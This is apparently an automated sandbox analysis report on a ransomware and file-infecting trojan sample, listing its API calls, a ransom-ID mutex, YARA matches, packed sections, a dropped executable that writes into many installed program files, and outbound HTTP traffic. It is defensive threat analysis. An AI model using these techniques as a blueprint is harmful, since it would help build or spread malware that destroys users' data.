Source: C:\Users\user\Desktop\SY5DeZW6pz.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Crypto Jump to behavior
Source: C:\Users\user\Desktop\SY5DeZW6pz.exe File created: C:\Users\user\AppData\Local\Temp\vSQshX.exe Jump to behavior
Source: classification engine Classification label: mal100.rans.spre.troj.evad.winEXE@7/17@1/2
Source: C:\Users\user\Desktop\SY5DeZW6pz.exe Code function: 0_2_0F397330 VirtualAlloc,VirtualAlloc,GetUserNameW,VirtualAlloc,GetComputerNameW,wsprintfW,VirtualAlloc,wsprintfW,VirtualAlloc,RegOpenKeyExW,RegQueryValueExW,GetLastError,RegCloseKey,VirtualFree,VirtualAlloc,VirtualAlloc,wsprintfW,RegOpenKeyExW,RegQueryValueExW,GetLastError,RegCloseKey,lstrcmpiW,wsprintfW,VirtualFree,VirtualAlloc,VirtualAlloc,wsprintfW,GetNativeSystemInfo,VirtualAlloc,wsprintfW,ExitProcess,wsprintfW,VirtualAlloc,VirtualAlloc,GetWindowsDirectoryW,GetVolumeInformationW,lstrlenW,wsprintfW,lstrcatW,lstrcatW,GetModuleHandleW,GetProcAddress,lstrlenW,VirtualFree,lstrcatW,VirtualAlloc,GetDriveTypeW,lstrcatW,lstrcatW,lstrcatW,GetDiskFreeSpaceW,lstrlenW,wsprintfW,wsprintfW,lstrlenW,lstrlenW,wsprintfW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,lstrlenW,VirtualAlloc,VirtualFree, 0_2_0F397330
Source: C:\Users\user\Desktop\SY5DeZW6pz.exe Code function: 0_2_0F3946F0 CreateToolhelp32Snapshot,VirtualAlloc,Process32FirstW,CloseHandle,lstrcmpiW,OpenProcess,TerminateProcess,CloseHandle,CloseHandle,CloseHandle,Process32NextW,VirtualFree,FindCloseChangeNotification, 0_2_0F3946F0
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5580
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5540
Source: C:\Users\user\Desktop\SY5DeZW6pz.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\pc_group=WORKGROUP&ransom_id=f816ca825b40424e
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe Automated click: OK
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe Automated click: OK
Source: SY5DeZW6pz.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH

Data Obfuscation

barindex
Source: Yara match File source: SY5DeZW6pz.exe, type: SAMPLE
Source: Yara match File source: 0.0.SY5DeZW6pz.exe.3760000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.0.SY5DeZW6pz.exe.f390000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.SY5DeZW6pz.exe.3760000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.0.SY5DeZW6pz.exe.f390000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.SY5DeZW6pz.exe.3760000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.0.SY5DeZW6pz.exe.f390000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.0.SY5DeZW6pz.exe.3760000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.SY5DeZW6pz.exe.f390000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000000.307798996.000000000F39A000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.353018126.000000000F39A000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000000.324788306.000000000F39A000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000000.317714677.000000000F39A000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.352730641.0000000003760000.00000008.00000001.00040000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000000.324233119.0000000003760000.00000008.00000001.00040000.00000003.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: SY5DeZW6pz.exe PID: 5580, type: MEMORYSTR
Source: C:\Users\user\Desktop\SY5DeZW6pz.exe Code function: 0_2_0F3A8E7B push ebp; ret 0_2_0F3A8E7E
Source: C:\Users\user\Desktop\SY5DeZW6pz.exe Code function: 0_2_0F3A8E85 push 00000000h; ret 0_2_0F3A9296
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe Code function: 1_2_00C21638 push dword ptr [00C23084h]; ret 1_2_00C2170E
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe Code function: 1_2_00C2600A push ebp; ret 1_2_00C2600D
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe Code function: 1_2_00C26014 push 00C214E1h; ret 1_2_00C26425
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe Code function: 1_2_00C22D9B push ecx; ret 1_2_00C22DAB
Source: SY5DeZW6pz.exe Static PE information: section name: |Zu8
Source: SY5DeZW6pz.exe Static PE information: section name: .dat_0
Source: SY5DeZW6pz.exe Static PE information: section name: .dat_1
Source: SY5DeZW6pz.exe Static PE information: section name: .dat_2
Source: SY5DeZW6pz.exe Static PE information: section name: .dat_3
Source: SY5DeZW6pz.exe Static PE information: section name: .dat_4
Source: SY5DeZW6pz.exe Static PE information: section name: .dat_5
Source: SY5DeZW6pz.exe Static PE information: section name: .dat_6
Source: SY5DeZW6pz.exe Static PE information: section name: .dat_7
Source: SY5DeZW6pz.exe Static PE information: section name: .dat_8
Source: SY5DeZW6pz.exe Static PE information: section name: .dat_9
Source: SY5DeZW6pz.exe Static PE information: section name: .dat_10
Source: SY5DeZW6pz.exe Static PE information: section name: .dat_11
Source: SY5DeZW6pz.exe Static PE information: section name: .dat_12
Source: SY5DeZW6pz.exe Static PE information: section name: .dat_13
Source: SY5DeZW6pz.exe Static PE information: section name: .dat_14
Source: SY5DeZW6pz.exe Static PE information: section name: .dat_15
Source: SY5DeZW6pz.exe Static PE information: section name: .dat_16
Source: SY5DeZW6pz.exe Static PE information: section name: .dat_17
Source: SY5DeZW6pz.exe Static PE information: section name: .dat_18
Source: SY5DeZW6pz.exe Static PE information: section name: .dat_19
Source: SY5DeZW6pz.exe Static PE information: section name: .dat_20
Source: SY5DeZW6pz.exe Static PE information: section name: .dat_21
Source: SY5DeZW6pz.exe Static PE information: section name: .dat_22
Source: SY5DeZW6pz.exe Static PE information: section name: .dat_23
Source: SY5DeZW6pz.exe Static PE information: section name: .dat_24
Source: SY5DeZW6pz.exe Static PE information: section name: .dat_25
Source: SY5DeZW6pz.exe Static PE information: section name: .dat_26
Source: SY5DeZW6pz.exe Static PE information: section name: .dat_27
Source: SY5DeZW6pz.exe Static PE information: section name: .dat_28
Source: SY5DeZW6pz.exe Static PE information: section name: .dat_29
Source: SY5DeZW6pz.exe Static PE information: section name: .dat_30
Source: SY5DeZW6pz.exe Static PE information: section name: .dat_31
Source: SY5DeZW6pz.exe Static PE information: section name: .dat_32
Source: SY5DeZW6pz.exe Static PE information: section name: .dat_33
Source: SY5DeZW6pz.exe Static PE information: section name: .dat_34
Source: SY5DeZW6pz.exe Static PE information: section name: .dat_35
Source: SY5DeZW6pz.exe Static PE information: section name: .dat_36
Source: SY5DeZW6pz.exe Static PE information: section name: .dat_37
Source: SY5DeZW6pz.exe Static PE information: section name: .dat_38
Source: SY5DeZW6pz.exe Static PE information: section name: .dat_39
Source: SY5DeZW6pz.exe Static PE information: section name: .dat_40
Source: SY5DeZW6pz.exe Static PE information: section name: .dat_41
Source: SY5DeZW6pz.exe Static PE information: section name: .dat_42
Source: SY5DeZW6pz.exe Static PE information: section name: .dat_43
Source: SY5DeZW6pz.exe Static PE information: section name: .dat_44
Source: SY5DeZW6pz.exe Static PE information: section name: .dat_45
Source: SY5DeZW6pz.exe Static PE information: section name: .dat_46
Source: SY5DeZW6pz.exe Static PE information: section name: .dat_47
Source: SY5DeZW6pz.exe Static PE information: section name: .dat_48
Source: SY5DeZW6pz.exe Static PE information: section name: .dat_49
Source: vSQshX.exe.0.dr Static PE information: section name: .aspack
Source: vSQshX.exe.0.dr Static PE information: section name: .adata
Source: MyProg.exe.1.dr Static PE information: section name: PELIB
Source: MyProg.exe.1.dr Static PE information: section name: Y|uR
Source: SciTE.exe.1.dr Static PE information: section name: ruO
Source: C:\Users\user\Desktop\SY5DeZW6pz.exe Code function: 0_2_0F398150 CryptAcquireContextW,VirtualAlloc,GetModuleHandleA,LoadLibraryA,GetProcAddress,CryptReleaseContext,VirtualFree,CryptReleaseContext,VirtualFree, 0_2_0F398150
Source: initial sample Static PE information: section where entry point is pointing to: |Zu8
Source: initial sample Static PE information: section name: |Zu8 entropy: 6.934749160260163
Source: initial sample Static PE information: section name: .text entropy: 7.81169422100848
Source: initial sample Static PE information: section name: Y|uR entropy: 6.934889298048315
Source: initial sample Static PE information: section name: ruO entropy: 6.934278783546333

Persistence and Installation Behavior

barindex
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\google\Update\1.3.36.131\GoogleUpdateComRegisterShell64.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\AcroRd32.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.Container.NetFX40.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files\Google\Chrome\Application\104.0.5112.81\chrome_pwa_launcher.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\google\Update\1.3.36.131\GoogleUpdate.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\lync.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\misc.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\DCF\filecompare.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\lync99.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\autoit3\AutoIt3Help.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\java\jre1.8.0_211\bin\ssvagent.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\UcMapi.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\ONENOTE.EXE Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\PDFREFLOW.EXE Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\autoit3\Examples\Helpfile\Extras\MyProg.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\WINWORD.EXE Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\AcroBroker.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\MSOSREC.EXE Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\OUTLOOK.EXE Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\DCF\Common.DBConnection.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\protocolhandler.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\MSQRY32.EXE Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\wow_helper.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files\Google\Chrome\Application\104.0.5112.81\notification_helper.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\arh.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\SELFCERT.EXE Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.Container.NetFX45.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\WORDICON.EXE Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\MSPUB.EXE Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\google\Update\1.3.36.131\GoogleCrashHandler64.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files\Google\Chrome\Application\chrome.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\java\jre1.8.0_211\bin\jabswitch.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\ADelRCP.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\DCF\DATABASECOMPARE.EXE Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\google\Update\1.3.36.131\GoogleCrashHandler.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\SETLANG.EXE Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\autoit3\Aut2Exe\Aut2exe_x64.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\ACCICONS.EXE Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\FIRSTRUN.EXE Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\MSACCESS.EXE Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\POWERPNT.EXE Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\autoit3\Uninstall.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\google\Update\1.3.36.131\GoogleUpdateCore.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\DCF\Common.ShowHelp.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\SCANPST.EXE Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\autoit3\Au3Check.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\java\jre1.8.0_211\bin\jp2launcher.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\setup.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\MSOHTMED.EXE Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\CLVIEW.EXE Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\NAMECONTROLSERVER.EXE Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\IEContentService.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\java\jre1.8.0_211\bin\java.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\CNFNOT32.EXE Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files\Google\Chrome\Application\104.0.5112.81\Installer\chrmstp.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files\Microsoft Office\Office16\AppSharingHookController64.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\excelcnv.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\GROOVE.EXE Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\OcPubMgr.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\AcroRd32Info.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\java\jre1.8.0_211\bin\java-rmi.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\AcroTextExtractor.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\google\Update\1.3.36.131\GoogleUpdateBroker.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\java\jre1.8.0_211\bin\unpack200.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\java\jre1.8.0_211\bin\javacpl.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\ONENOTEM.EXE Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\AcroLayoutRecognizer\AcroLayoutRecognizer.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\msoev.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\MSOUC.EXE Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files\Microsoft Office\Office16\MSOHTMED.EXE Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\autoit3\SciTE\SciTE.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\GRAPH.EXE Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\EXCEL.EXE Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\PPTICO.EXE Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\LogTransport2.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.Container.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\lynchtmlconv.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\java\jre1.8.0_211\bin\javaws.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files\Google\Chrome\Application\104.0.5112.81\elevation_service.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\AcroCEF\RdrServicesUpdater.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\Eula.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\autoit3\Au3Info.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\autoit3\AutoIt3_x64.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\AppSharingHookController.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\OSPPREARM.EXE Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\MSOSYNC.EXE Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\XLICONS.EXE Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\DCF\Common.DBConnection64.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files\Microsoft Office\Office16\msoia.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\104.0.5112.81\chrome_installer.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\autoit3\Au3Info_x64.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\Wordconv.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\autoit3\Aut2Exe\Aut2exe.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\DCF\SPREADSHEETCOMPARE.EXE Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft analysis services\AS OLEDB\110\SQLDumper.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\VPREVIEW.EXE Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\reader_sl.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\autoit3\Aut2Exe\upx.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\google\Update\1.3.36.131\GoogleUpdateSetup.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\msotd.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\java\jre1.8.0_211\bin\orbd.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file written: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe File created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe Jump to dropped file
Source: C:\Users\user\Desktop\SY5DeZW6pz.exe File created: C:\Users\user\AppData\Local\Temp\vSQshX.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe File created: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe Jump to dropped file

Hooking and other Techniques for Hiding and Protection

barindex
Source: unknown Network traffic detected: HTTP traffic on port 49707 -> 799
Source: unknown Network traffic detected: HTTP traffic on port 49708 -> 799
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
